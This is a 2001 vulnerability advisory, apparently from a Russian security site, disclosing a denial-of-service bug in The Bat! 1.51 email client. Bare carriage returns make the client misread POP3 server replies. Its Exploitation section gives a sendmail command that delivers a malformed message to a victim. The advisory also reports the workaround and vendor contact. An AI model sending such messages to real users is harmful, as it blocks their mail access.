Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Проблема в The Bat! (<CR> handling)

From:3APA3A <3APA3A_(at)_security.nnov.ru>
Date:18.04.2001
Subject:SECURITY.NNOV: The Bat! <cr> bug

SECURITY.NNOV URL:     http://www.security.nnov.ru
Topic:                  The Bat! <cr> bug
Application:            The Bat! 1.51 (latest)
Vendor:                 RitLabs
Category:               Denial of Service
Risk Factor:            Low
Remote:                 Yes
Vendor Contacted:       13.04.2001
Software URL:          http://www.thebat.net
Vendor URL:            http://www.ritlabs.com

+Introduction:

The  Bat!  Is  very  convenient commercially available MUA for Windows
with lot of features.

+Details:

While  RETRiving  message  via  POP3  (IMAP  isn't  tested)  The Bat!
incorrectly  processes  0x0D  (CR)  character if it's not followed by
0x0A  (LF).  Probably  each 0x0D character is treated as 2 octets and
The  Bat!  incorrectly calculates size of the message and the part of
message  is  treated  as  reply  from  POP3 server. The Bat! fails to
receive  the  rest  of  the  messages  and  fails  to delete received
messages  from server. This leads to DoS against user's POP3 account.
Malformed message can emulate any POP3 server replies.

+Exploitation:

Extract attached "badmessage" and send it, e.g. using

  cat badmessage | sendmail -U victim@somewhere.net

or copy it to user's mailbox.
This message causes The Bat! to show something like:

  !13.04.2001, 17:51:01: FETCH - Server reports error. The response is: --ERR Wrong User: replace user
with your system administrator--


+Workaround:

use  "Dispatch  Mail  on  Server" feature to delete malformed message
from server or use different MUA.


+Solution:

No yet.

+Vendor:

RitLabs  was  contacted  on April, 13 (happy Easter to you, guys). No
feedback yet.

This  advisory  is being provided to you under RFPolicy v.2 documented
at http://www.wiretrip.net/rfp/policy.html.


--
http://www.security.nnov.ru
        /\_/\
       { . . }     |\
+--oQQo->{ ^ }<-----+ \
|  3APA3A  U  3APA3A   }
+-------------o66o--+ /
                   |/
You know my name - look up my number (The Beatles)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru